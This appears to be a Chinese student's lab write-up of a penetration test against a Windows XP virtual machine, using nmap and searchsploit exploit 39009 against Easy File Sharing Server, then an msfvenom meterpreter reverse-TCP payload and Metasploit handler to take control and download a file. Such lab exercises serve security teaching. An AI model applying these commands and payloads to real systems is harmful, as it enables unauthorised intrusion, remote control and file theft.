实验课复现内容

# 漏洞渗透测试

1、靶机 (Windows) 安装 easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用 Nmap 扫描发现靶机 (Windows) 运行了该服务。P99-100
3、利用该漏洞,使得靶机运行计算器。P116-119

# 环境搭建

靶机:WinXP
开启 easy file sharing 服务
攻击机:kali2022
两机位于同一网段内,需要相互 ping 通
(如遇无法 ping 通的情况,可关闭 winXP 的防火墙)

# 渗透过程

打开 kail 攻击机,扫描同一子网下主机

arp-scan -l


对靶机进行进一步扫描,查看端口开放情况

nmap -sV -A 192.168.232.132


知道了靶机开放端口服务
使用 searchsploit

searchsploit easy file sharing
searchsploit -m 39009


运行脚本 python2+path+ip+port

由于脚本输出没有使用严格括号,需要声明 py2 运行

python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.232.132 80


Done 表示脚本执行完成,打开靶机发现计算器已弹出

至此完成渗透

# Metasploit 应用

1、生成主控端、被控端。
2、获得靶机 (Windows) 控制权。
3、下载靶机上任意一个文件。P121-123;140-145

# 环境搭建

靶机:winXP (192.168.232.132)
攻击机:kali (192.168.232.130)
注意两机位于同一网段内

# 渗透过程

生成被控端,在 kali 以 root 账户执行

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.232.130 lport=5000 -f exe -o /root/payload.exe

生成 payload.exe 后传到靶机

生成主控端
再次以 root 账户执行

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.232.130
set lport 5000
exploit


此时,将生成的 payload.exe 程序复制到靶机上运行
成功获取权限
执行 ls 查看需要的文件。输入 dowload log.txt 下载文件

成功下载文件

更新於 閱讀次數

請我喝[茶]~( ̄▽ ̄)~*

Xyan 微信支付

微信支付

Xyan 支付寶

支付寶